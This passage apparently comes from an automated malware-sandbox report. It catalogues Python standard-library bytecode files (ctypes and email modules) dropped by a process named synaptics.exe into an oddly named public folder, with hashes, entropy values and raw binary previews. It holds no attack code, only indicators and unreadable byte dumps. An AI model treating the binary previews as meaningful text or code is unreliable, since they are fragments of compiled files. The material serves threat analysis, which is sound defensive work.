                                                                                                                                                                                      Preview:o........'-dwH.......................@...s(...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.k.rJe.d.e.e.....e.j.d.k.rUd.d.l.m.Z...e.Z.e.j.d.k.rqe.j.d.k.rqe.e.....j...d...d.....d.k.rqe.Z.d.d.l.m.Z m!Z"m#Z$m%Z&..d}d.d...Z'd}d.d...Z(i.Z)d.d...Z*e.j.d.k.r.d.d.l.m+Z,..d.d.l.m-Z...i.Z/d.d...Z0e0j.r.e*j..1d.d...e0_.n.e.j.d.k.r.d.d.l.m2Z,..d.d.l.m3Z3m4Z4m5Z5m6Z6m7Z7..d.d.l.m8Z8m9Z9..d.d l.m:Z:..d}d!d"..Z;G.d#d$..d$e:..Z<e;e<d%....G.d&d'..d'e:..Z=e;e=....G.d(d)..d)e:..Z>e;e>....G.d*d+..d+e:..Z?e;e?....G.d,d-..d-e:..Z@e;e@....e.d...e.d/..k...r'e?ZAe@ZBn.G.d0d1..d1e:..ZAe;eA....G.d2d3..d3e:..ZBe;eB....G.d4d5..d5e:..ZCe;eC....G.d6d7..d7e:..ZDe;eD....G.d8d9..d9e:..ZEe3eE..e3eD..k...rjeDZEe.d/..e.d:..k...rxe?ZFe@ZGn.G.d;d<..d<e:..ZFe;eF....G.d=d>..d>e:..ZGe;eG....G.d?d@..d@e:..ZHeH..eH_IeH_Je;eH....G.dAdB..dBe:..ZKeK..eK_IeK_Je;eK....G.dCdD..dDe:..ZLeL..eL_IeL_Je;eL....G.dEdF..dFe:..ZMe;eMd%....G.dGdH..dHe:..ZNeNZO
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1914
                                                                                                                                                                                      Entropy (8bit):5.217988533253076
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:v7p1APBJ0tfAE4yxn4rX4kbruu/fdq7RvRhPAEV5wq:l6r0OhyuLtV1qRoEV9
                                                                                                                                                                                      MD5:B0F649A78E4D6B1EFF1431689B8BEAD6
                                                                                                                                                                                      SHA1:1DE2B0406F2EAFB7A4A92589861DFEB236311E1B
                                                                                                                                                                                      SHA-256:13F8D900754927F4EB07E5F92BFFD3821156376E2171BA9DB9F4BA8A69E76E23
                                                                                                                                                                                      SHA-512:69D888A89EA7FD1CD7153546E1B5FF59C0975682E4899010065450069758F9091C2BC287A9477221C61CF1995C58B0FD9CBC20C3D5EB765FFA27CD8EB6584C3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.T.e.e...Z.d.d...Z.G.d.d...d.e.e.....Z.e.j.d.k.r/d.Z.e.Z.G.d.d...d.e.e.d...Z.d.S.e.j.d.k.rDd.Z.e.Z.G.d.d...d.e.e.d...Z.d.S.e.d.....)......N)...*c....................C...sH...t.|.t...r.t.|.t...S.t.|.t...r.t.|.j...|.j...S.t.|.t...r.|.S.t.d.|.......).z.Return the type with the 'other' byte order. Simple types like. c_int and so on already have __ctype_be__ and __ctype_le__. attributes which contain the types, for more complicated types. arrays and structures are supported.. z+This type does not support other endian: %s)...hasattr.._OTHER_ENDIAN..getattr..isinstance.._array_type.._other_endian.._type_Z._length_..issubclass..Structure..TypeError)...typ..r.....2C:\Users\Public\QExvbmVOb25l\lib\ctypes\_endian.pyr........s..................r....c........................s....e.Z.d.Z...f.d.d...Z.....Z.S.)..._swapped_metac........................s^...|.d.k.r&g.}.|.D.].}.|.d...}.|.d...}.|.d.d.....}.|...|.t.|...f.|.......q.|.}.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8325
                                                                                                                                                                                      Entropy (8bit):5.4800871510315226
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:s+G6LCXBDrl73zbXCL3mm0LGuZ7Iv0nwMXwDRi4qzDj:sloiDp7Do0LGutnwMXExqzDj
                                                                                                                                                                                      MD5:DB18EDF9EDBAE3DD2D37622EB7DFCE11
                                                                                                                                                                                      SHA1:78BA33E629B8D95B6007A5BD8EA039D6B45FE3EB
                                                                                                                                                                                      SHA-256:177EB52C4C4F37BC7F01099B0DCD39FE605D63B331641AF76BD17FD74A5509BF
                                                                                                                                                                                      SHA-512:FF1E36AB1F024F0DF6BDA2C60E6C2BBBADCDA9A48C6D17F640BAC2443263FDA974CF29F43AA177B5F7C91A210430894B215582E53637303FD531AA817EE56C3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.7.......................@...s@...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.d.k.r"d.d...Z.d.d...Z.d.d...Z.noe.j.d.k.r7e.j.d.k.r7d.d.l.m.Z...d.d...Z.nZe.j...d...rDd.d.l.m.Z...nMe.j.d.k.r.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.e.j.d.k.rcd.d...Z.n.d.d...Z.e.j...d...rvd.d...Z.d.d...Z.n.e.j.d.k.r.d.d...Z.d'd.d...Z.n.d.d ..Z.d!d"..Z.d#d...Z.d$d%..Z.e.d&k.r.e.....d.S.d.S.)(.....N..ntc....................C...s....d.}.t.j...|...}.|.d.k.r.d.S.|.t.|.....}.t.j.|.d.......d.d...\.}.}.t.|.d.d.......d...}.|.d.k.r3|.d.7.}.t.|.d.d.......d...}.|.d.k.rCd.}.|.d.k.rK|.|...S.d.S.).z.Return the version of MSVC that was used to build Python... For Python 2.3 and up, the version number is included in. sys.version. For earlier versions, assume the compiler is MSVC 6.. z.MSC v...........N.. .........................g......$@r....)...sys..version..find..len..split..int)...prefix..i..s..restZ.majorVersionZ.minorVersion..r...../C:\Users\Public\QExvbmVOb25l\lib\ctypes\util.py.._get_build_version.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4871
                                                                                                                                                                                      Entropy (8bit):5.545621791282772
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:0n7SgQvVTrUEp2DHdwyeOXd97wUah1VWyGPTYPrVgI+AxROhOFPN:0n6VTAEp2DH+yZXjw7h1VWJSZe2N
                                                                                                                                                                                      MD5:28F52ADCEE0136686A3583CE740D09FA
                                                                                                                                                                                      SHA1:D4A13B70CB8A3417684AEA45ABC0C9577EEAC2F7
                                                                                                                                                                                      SHA-256:05B71A0C0D64AE7E01D6C436C00372B10B3475D2ABC3B30FA823A192475FBF1D
                                                                                                                                                                                      SHA-512:C3BF80F25B9421131AB8A0A57ED4E357766314AB946F77989BF26B88BF37B4C34C039C636AE5E33A203AE7B4DFBBB59F07E65881FCB408D53B9667D6DF90DA12
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.Z.e.j.Z.G.d.d...d.e.j...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j...Z.Z.e.j ..Z!Z"e.j#..Z$..Z%Z&e.j#..Z'Z(e.j)..Z*Z+e.j,..Z-Z.e../e.j...e../e.j,..k.rle.j.Z0e.j.Z1n.e../e.j...e../e.j,..k.r~e.j Z0e.j.Z1e.Z2e.Z3e.Z4e.Z5e.Z6e.Z7e.j,Z8e8Z9e8Z:e8Z;e8Z<e8Z=e8Z>e8Z?e8Z@e8ZAe8ZBe8ZCe8ZDe8ZEe8ZFe8ZGe8ZHe8ZIe8ZJe8ZKe8ZLe8ZMe8ZNe8ZOe8ZPe8ZQe8ZRe8ZSe8ZTe8ZUe8ZVe8ZWG.d.d...d.e.jX..ZYeY..ZZ..Z[Z\G.d.d...d.e.jX..Z]e]Z^G.d.d...d.e.jX..Z_G.d.d...d.e.jX..Z`e`..Za..ZbZcG.d.d...d.e.jX..Zded..ZeZfd.d...ZgG.d.d...d.e.jX..ZhehZiG.d.d...d.e.jX..ZjejZkd.ZlG.d.d...d.e.jX..ZmG.d.d...d.e.jX..Zne..oe.....ZpZqe..oe...Zre..oe.....ZsZte..oe...Zue..oe4..Zve..oe.....ZwZxe..oeh....ZyZze..oe...Z{e..oe8....Z|Z}e..oeG..Z~e..oeH..Z.e..oe.....Z.Z.e..oe...Z.e..oe7..Z.e..oe.....Z.Z.e..oej....Z.Z.e..oe`....Z.Z.e..oec..Z.e..oeY....Z.Z.e..oe\....Z.Z.e..oeV..Z.e..oe...Z.e..oed....Z.Z.e..oef....Z.Z.e..oe^..Z.e..oe.....Z.Z.e..oe"..Z.e..o
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1573
                                                                                                                                                                                      Entropy (8bit):4.9094289530923545
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:wwQTrfch6OD9tLNoVThNVAH4N6rqNkh8O:wprfch6OloBLWo6rWk+O
                                                                                                                                                                                      MD5:F285FB40AC12B7C98D10EC556318E15A
                                                                                                                                                                                      SHA1:2316B7A9EF592D15D9256207F0B4B8048B58FE86
                                                                                                                                                                                      SHA-256:7CCC3072CA3B6B93838ACD0D5A3E6BAAA30B1034F49C2EEC1E8810E617C248DE
                                                                                                                                                                                      SHA-512:1291508C98BA1464C4001E3A28F660C88317B99D283779D34D36156FF5EE7431DFED8E4810681517677D5214D0BE46629747ECD1040275A807C47382C700855C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d$........................@...s0...d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z?A package for parsing, handling, and generating email messages.).Z.base64mime..charsetZ.encoders..errorsZ.feedparser..generator..headerZ.iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytesZ.mimeZ.parserZ.quoprimime..utilsc....................O.... ...d.d.l.m.}...|.|.i.|.......|...S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr....Z.parsestr)...s..args..kwsr......r.....2C:\Users\Public\QExvbmVOb25l\lib\email\__init__.pyr.... ............r....c....................O...r....).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r........BytesParser).r....r....Z.parsebytes).r....r....r....r....r....r....r....r....(...r....r....c....................O...r....).z.Rea
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5753
                                                                                                                                                                                      Entropy (8bit):5.418992484992734
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:gOU9w0nmhN4XpaTzT797ta3T8qCpjjRtfklxvvp/qLfrg8NNOGbM//qH1uqs:ygN0UHy8h7fOvh/WgGN6XqHkqs
                                                                                                                                                                                      MD5:E7C75A7AC2CAAB480C1EFCFABE15518E
                                                                                                                                                                                      SHA1:1BC5A788EDB7C6F1171A052BCD76AC945B6C696A
                                                                                                                                                                                      SHA-256:5556C917A0A14C1F2F902721600B50091A580F68C2ECDBADA9AEBE64427E977C
                                                                                                                                                                                      SHA-512:B1A18E86DBB51CD31464974AA940AE5E95C22AAD0B583E08F53CCA490770B76455C8DC696038C64A534FE718BD2341313FC010367A81ECAFFB2F43CA6D08C055
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dF".......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e...e...d...j.d.d.....Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.e.e.d...<.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.e.d...Z.d.d...Z.e.e.d...Z.e.e.d...Z.d d.d...Z.d.S.)!z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c....................C...s....t...|...d.........S.).N.....)...bytes..fromhex..groupr....)...m..r.....8C:\Users\Public\QExvbmVOb25l\lib\email\_encoded_words.py..<lambda>A...s......r....c....................C...s....|...d.d...}.t.|...g.f.S.).N....._..... )...replace.._q_byte_subber)...encodedr....r....r....r....C...s........r....c....................@...s,...e.Z.d.Z.d.e...d.....e...d.....Z.d.d...Z.d.S.)..._QByteMaps..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12525
                                                                                                                                                                                      Entropy (8bit):5.369377032962507
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:48lfoQBPanIUGehShaPvqfaXJcCMr7UaZbWMFltbgKBk0:XlgoMGePP+7Ua0MpG0
                                                                                                                                                                                      MD5:F79F2B57A076E3FE13818915F2BFAD46
                                                                                                                                                                                      SHA1:9F2587D834D467E694AAB27C7482BE1FD307D872
                                                                                                                                                                                      SHA-256:E9B9EAC8A23FBFB329CE87085D98DF37D771B6CDC9A63C9EC9B2FE2033C97293
                                                                                                                                                                                      SHA-512:E375EBB86CF14907D88EBBE331296DC0224D58DCF36CEC6E4CCF828F9267804984F4AC1E49F063C77D61959B50D078963022A10B04223E365A165677D1101378
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.G.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., ).Z.janZ.febZ.marZ.apr..mayZ.junZ.julZ.aug..sep..octZ.novZ.decZ.januaryZ.februaryZ.marchZ.aprilr....Z.juneZ.julyZ.augustZ.septemberZ.octoberZ.novemberZ.december).Z.monZ.tueZ.wedZ.thuZ.friZ.satZ.sunip...i....i....i....iD...i....).Z.UTZ.UTC..GMT..ZZ.ASTZ.ADTZ.ESTZ.EDTZ.CSTZ.CDTZ.MSTZ.MDTZ.PSTZ.PDTc....................C...s,...t.|...}.|.s.d.S.|.d...d.u.r.d.|.d.<.t.|...S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..res..r.....4C:\Users\Public\QExvbmVOb25l\lib\email\_parseaddr.pyr....-...s................r....c....................C...s....|.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14795
                                                                                                                                                                                      Entropy (8bit):5.0540292722350255
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:jbtx+Novk6H2JvwhY1jaF7AyJAeb7AqDNF/EIRDAysM1Jd/GaOkdlL7+WpSla/AB:jbteoM6H8vPiJAqVDApM1jeaOMh7G5rl
                                                                                                                                                                                      MD5:2E5E7E2B998222298FF3D4901DB0EF7D
                                                                                                                                                                                      SHA1:3131D09977A47C68D27F94942E040E3E5771B8B0
                                                                                                                                                                                      SHA-256:E295DF5EC5256741661105DD55EDF3D1D4862B2189ED622517F8AAA21E7F6905
                                                                                                                                                                                      SHA-512:ABCB98264C79E1292AE69E18FBBB26FAF1DE06F91E048A3C502F290ABFB21DD5DCF020D2264FC677E655406417111AABFEB1E3AA9220AE881FD44CAB29093D90
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dW<.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.G.d.d...d.e.e.j.d...Z.e.G.d.d...d.e.....Z.e...Z.d.S.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c........................s@...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance except for those values changed.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3253
                                                                                                                                                                                      Entropy (8bit):5.384022959760318
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:7OFLsbReNFxrB2QSaR+Eiig25FNV78ojIu:7ELsle35hjn5F5
                                                                                                                                                                                      MD5:CD3EFCEB9F05FF6D5140F93BD6F443A6
                                                                                                                                                                                      SHA1:F1CA7D998F276EA2344EC0A39CC0B0BAEE4758CF
                                                                                                                                                                                      SHA-256:1AAE0853D46FA3B2C8724FC9A7267E075538CBD6EE1ACE14C8890B6E6236BE97
                                                                                                                                                                                      SHA-512:06D64247C25532EF64150983C0049BF76483B7DE9CC409E0426C3B92DBC75C5798464C2D3447BEFF38B4B565CACE226848308FEF48A483ADD24A1DDE792078DD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d^........................@...sl...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d.d...Z.d.e.f.d.d...Z.d.d...Z.e.Z.e.Z.d.S.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.dec
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11588
                                                                                                                                                                                      Entropy (8bit):5.3249924589066016
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:+71q2Qm6z+wY/W28DGmahcQx6Pk/pO5oU/5Ob9WJ//abe8+xGb/+w:e1ZRS+Z+2yGRz/p2/5ObDbv+w
                                                                                                                                                                                      MD5:8F840A3C65347470506D4A464104841A
                                                                                                                                                                                      SHA1:919E09A8A882053F88FA6EFB649CEDAB9DE2C2F4
                                                                                                                                                                                      SHA-256:FFD1CB5F72CDCE46C8E7455F66866B655215AC7AA4F586F8506777265092B71E
                                                                                                                                                                                      SHA-512:6367C77919369A434A936DDF132558B39CB7F580C5DCC86DBE635EEAF79B95C6D8C80DE5DC1429EE38CE5F24850AB7CFF3E8527D96F82DC8A48F3F55BB22A579
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d|D.......................@...s....g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8d9..Z.d:d;..Z.d<d=..Z.d>d?..Z.G.d@dA..dA..Z.d.S.)B)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252Z.viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1Z.latin_2z.latin-2Z.latin_3z.latin-3Z.latin_4z.latin-4Z.latin_
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1640
                                                                                                                                                                                      Entropy (8bit):5.09430712102992
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1y7gaTT5rqICrNt7xwM2WuNXwQFd9EGZvPJ5rJxEwkJpDkvyz3:1/9ht7mVWEgQFYSvrEDkvyz3
                                                                                                                                                                                      MD5:6193BC79BEA53F20BCA62D3AACC5FFEC
                                                                                                                                                                                      SHA1:C4D0A292F34C53A94F232E366E0EDEB6F80199E5
                                                                                                                                                                                      SHA-256:C0C8C29C776C24C9C8AE4598BA8654F085BDC812DD5AD1DE5DBB23EEB9ED170A
                                                                                                                                                                                      SHA-512:C7A8DB139F52D89FD20B66EDE74E19CF6D78CA96E2836477925AFE7E9DABB11718AEF5D8FBEAD3C61684F9C0643A16DEC61C2BFC38464989DA8F297C5E4B8015
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d?........................@...sP...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc....................C...s....t.|.d.d...}.|...d.d...S.).NT).Z.quotetabs..... s....=20)..._encodestring..replace)...s..enc..r.....2C:\Users\Public\QExvbmVOb25l\lib\email\encoders.py.._qencode....s........r....c....................C...s0...|.j.d.d...}.t.t.|...d...}.|...|.....d.|.d.<.d.S.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..origZ.encdatar....r....r....r........s............r....c....................C...s*...|.j.d.d...}.t.|...}.|...|.....d.|.d.<.d.S.).zvEncode the message's payload in quoted-printable... Also, add an appropriate Content-Transfer-Encoding
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5715
                                                                                                                                                                                      Entropy (8bit):4.737415860456932
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:wYI+E7YT1Z5Q6ELjeDJ87gw1aXJE6iqFoARF3IloR/Qg1pDX4Qmbsru3m:wYTEOHQJ2DJ87gtXJniqn3IeWQCQmbsz
                                                                                                                                                                                      MD5:88C8B56B8068A49B414157D6B2450F8A
                                                                                                                                                                                      SHA1:A23EDBD2313AE94BBD8E4DFD397D0130DFC1C610
                                                                                                                                                                                      SHA-256:DD893373CB9027427EA606425FF2A1FDC216A3BC25584A56A04838094FE94CC2
                                                                                                                                                                                      SHA-512:0216C7155551215ECE5783E5BDB8BDE1039247463CEB72A03F3C311F5EBA12273EA7E35564CE009C209E82CEAFA10CA7F0197B6F4A26D059D2D7F2E250332547
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e...Z.G.d+d,..d,e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e...Z.d5S.)6z email package exception classes.c....................@........e.Z.d.Z.d.Z.d.S.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__..r....r.....0C:\Users\Public\QExvbmVOb25l\lib\email\errors.pyr.................r....c....................@...r....)...MessageParseErrorz&Base class for message parsing errors.Nr....r....r....r....r....r........r....r....c....................@...r....)...HeaderParseErrorz.Error while parsing headers.Nr....r....r....r....r....r.....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10591
                                                                                                                                                                                      Entropy (8bit):5.449741674183775
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:MQt3lEmZ0KYgjRm95weZd6S3DFKTbefqi0G332hjD8gK1W:HtVEe0KYr5weZJ3DFSbeiu329D8j1W
                                                                                                                                                                                      MD5:DEDCFCF06E25914BA9561BC3420DDB48
                                                                                                                                                                                      SHA1:3AAD0AFE226C223554A6C09FF537243CEE56581F
                                                                                                                                                                                      SHA-256:1672B6E2A720869D83C8727B31E88C26A841872159E914B8D591BB84A0DB87C5
                                                                                                                                                                                      SHA-512:94B69F16532D5B893498807998181A136A0B3B3097911D741CF89F0136E42EFECACA1ADCD3FFDB42579C5F17A8D88EA8DB2B8E1EB12ED8AD3C538B424928CF9B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.[.......................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e...d...Z.d.Z.d.Z.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead, when it finds something unexpected, it adds a 'defect' to.the current message. Defects are just instances that live on the message.object's .defects a
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16475
                                                                                                                                                                                      Entropy (8bit):5.35787207640989
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:lEojVdGyA82fSNCT4HPb/bl36D/7FCjIMIlaTamNjHMSuXi90MXh:lE//8SScT4vb168cMXh
                                                                                                                                                                                      MD5:46C7FA53E5CE970BC6A186A6DBDF908B
                                                                                                                                                                                      SHA1:2094FEA8D2BF22A5B617E1F27DC06A255B4AC254
                                                                                                                                                                                      SHA-256:7EB19DB03A0BC255446E26C29E32233470EA83D9041C39D2AEA3F447965E68DC
                                                                                                                                                                                      SHA-512:2708534457C130276885CEC9BF5292CB1AB6300798BA15EA203F36E7A03BDCDC5C02D62AA7B509F838A6C6E5886B6E326B9EC4ED6DB6685FB9C2E967E9B6AD46
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
